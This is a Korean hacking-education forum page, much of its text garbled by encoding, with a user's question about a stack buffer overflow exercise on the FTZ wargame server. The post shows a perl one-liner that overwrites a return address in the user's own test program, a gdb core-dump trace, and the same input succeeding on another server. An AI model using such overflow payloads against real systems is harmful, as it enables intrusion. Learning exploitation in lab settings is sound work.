¸®´ª½º

 3923, 5/197 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   smile0909
   ftz ¼­¹ö¿¡¼­ Çí»çÄڵ尡 ½ºÅÿ¡ »ðÀÔµÇÁö ¾Ê¾Æ¿ä¤Ð

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_linux&no=4392 [º¹»ç]


°£´ÜÇÑ BOF¿¡ ´ëÇÑ °­ÀÇÀڷḦ ¸¸µé±â À§Çؼ­,  ftz¼­¹öÀÇ guest°èÁ¤À¸·Î ·Î±×ÀÎÇÏ¿© Å×½ºÆ® ÁßÀä.
ÄÄÆÄÀϽÿ¡ °É ¼ö ÀÖ´Â ¿É¼ÇÀº ¸ðµÎ °Ç »óÅÂÀ̱¸¿ä. (-z execstack -fno-builtin -mpreferred-stack-boundary=2)

bof°ø°ÝÀ¸·Î ½ºÅÃÀÇ return addressºÎºÐ¿¡ ÁÖ¼Ò°ª(\x92\x83\x04\x08)À» ³ÖÀ¸·Á°í Çϴµ¥ ¾ÈµÇ±æ·¡..
ÄÚ¾î´ýÇÁ¸¦ ¶°º¸´Ï, ÀÚ²Ù \xc2\x92\xc2\x83\xc2\x04\xc2\x08¿Í °°ÀÌ, Áß°£¿¡ \xc2°ªÀÌ µé¾î°¡°í ÀÖ´Â »óȲÀ̳׿ä.

charÇü ¹è¿­ bufferÅ©±â´Â 4À̱¸¿ä.
¾Æ·¡Ã³·³ ³ª¿É´Ï´Ù..

[guest@ftz test]$ perl -e 'print "a"x4,"b"x4,"\x92\x83\x04\x08"' | ./test
aaaabbbb혪혘
Segmentation fault (core dumped)
[guest@ftz test]$ gdb test core.9330
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
Core was generated by `./test'.
Program terminated with signal 11, Segmentation fault.
Cannot access memory at address 0x400160b0
#0  0x83c292c2 in ?? ()


Ȥ½Ã ½ºÅÃÂÊ¿¡ Çí»çÄڵ带 ³ÖÀ¸¸é Áß°£¿¡ ¾²·¹±â°ªÀÌ µé¾î°¡µµ·Ï ÀǵµÇϽŰǰ¡¿ä?
¿¹Àü¿¡´Â ºÐ¸íÈ÷ 됬´ø ¹æ½ÄÀε¥... ÀÌ»óÇϳ׿ä.. ÀÛ³âÀΰ¡ Á¦ÀÛ³âÀΰ¡´Â ºÐ¸íÈ÷ ftz¼­¹ö¿¡¼­µµ 됬´ø °Í °°Àºµ¥ ¿Ö °©Àڱ⠾ȵÇÁÒ?¤Ð¤Ð

+
¾Æ·¡¿Í °°ÀÌ, BOF¿øÁ¤´ë ¼­¹ö¿¡¼­´Â Àß µ¿ÀÛÇÕ´Ï´Ù. (Á¦°¡ guest°èÁ¤À» µû·Î ¸¸µé¾îµ×½À´Ï´Ù.)
[guest@localhost test]$ perl -e 'print "a"x4,"b"x4,"\x38\x84\x04\x08"' | ./test
aaaabbbb8?
bof success!
  Hit : 2647     Date : 2015/01/23 04:38


    
3843   ftz level1 ¿¡¼­ Áú¹® ÀÖ½À´Ï´Ù µµ¿ÍÁÖ¼¼¿ä ¤Ì¤Ð     bg3209
 03/04 2899
3842   ftz Áú¹®     ju031230
 03/02 2526
3841   I can't login with root on terminal (OS : fedora17)[6]     ±èº´±Ç
 01/29 2913
  ftz ¼­¹ö¿¡¼­ Çí»çÄڵ尡 ½ºÅÿ¡ »ðÀÔµÇÁö ¾Ê¾Æ¿ä¤Ð     smile0909
 01/23 2646
3839   ÅÚ³Ý ftz ¼­¹ö guest ºñ¹Ð¹øÈ£°¡ ¹º°¡¿ä[2]     ÁãÀÌ
 01/06 3200
3838   ÇØÄ¿½ºÄ𠸮´ª½º Æ®·¹À̴׿¡¼­ guest ºñ¹Ð¹øÈ£°¡ ¹º°¡¿ä??[1]     six6th
 01/06 3102
3837   hackerschool ·¹µåÇò ¸®´ª½º9.0°ü·ÃÁú¹®Àε¥¿ä     qotjddn6593
 01/06 2373
3836   CENT OS USB ¼³Ä¡ÈÄ ¹®Á¦     ifocean
 12/26 3111
3835   falcon os second °¡Áö°í ÀÖÀ¸½Å ¸ÚÁøºÐ ¾ø³ª¿ä?     jungkenji
 12/20 2835
3834   °©Àڱ⠻ý°¢³ª¼­ Áú¹®µå¸®´Âµ¥ ½º¸¶Æ®Æù¿¡ vmware[2]     nmy89
 12/17 3853
3833   ¸®´ª½º skelÀ̶ó´Â°Ô Á¤È­È÷¸ÓÁÒ?[2]     kdhan16
 12/17 4108
3832   kali linux¸¦ °¡»ó¸Ó½ÅÀ¸·Î ½ÇÇà½ÃÄ×À»¶§ ±Ã±ÝÇÑÁ¡[1]     cckcamp
 12/07 4080
3831   ÇØÄ¿½ºÄð°­Á ¸Û¸ÛÀÌÄÄÇ»Å͸¦Ã£¾Æ¶ó¿¡¼­.. ssh Æ÷Æ®¹øÈ£¾Ë¶§ telnetÀ¸·Î[1]     alsrbdu
 12/07 3579
3830   ¸®´ª½º x windows (VMware)[1]     inwoong32
 11/30 2644
3829   Ã¥À» °í¹ÎÇÏ°í ÀÖ½À´Ï´Ù.[2]     calliope7487
 11/19 3214
3828   ¹éÆ®·¢5 wlan0 Ĩ¼ÂÀÌ UnknownÀ¸·Î ³ªÅ¸³ª´Â°Ô ¹®Á¦°¡ µÇ³ª¿ä?     jeah9441
 11/14 2860
3827   VMware Backtrack5 USB¹«¼±·£Ä«µå Áú¹®     jeah96
 11/11 3258
3826   vi ¼Ò½º Äڵ带 º¸°í ½ÍÀºµ¥¿ä[2]     lionpoo
 11/11 2955
3825   °¡»ó¸Ó½Å¿¡ ¿ìºÐÅõ¸¦ ±ò°í ssh ¼³Ä¡ÈÄ °¡»ó¸Ó½Å ÀÚü¿¡¼­ Æ÷Æ®Æ÷¿öµù°ú °øÀ¯±â Æ÷Æ®Æ÷¿öµù¿¡¼­ÀÇ ¹®Á¦°¡...     ehaakdl
 11/01 3161
3824   ¸®´ª½º Å͹̳Π⠾°Ô ¶ç¿ì³ª¿ä?[2]     cksrjfl1996
 10/09 4924
[1][2][3][4] 5 [6][7][8][9][10]..[197]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org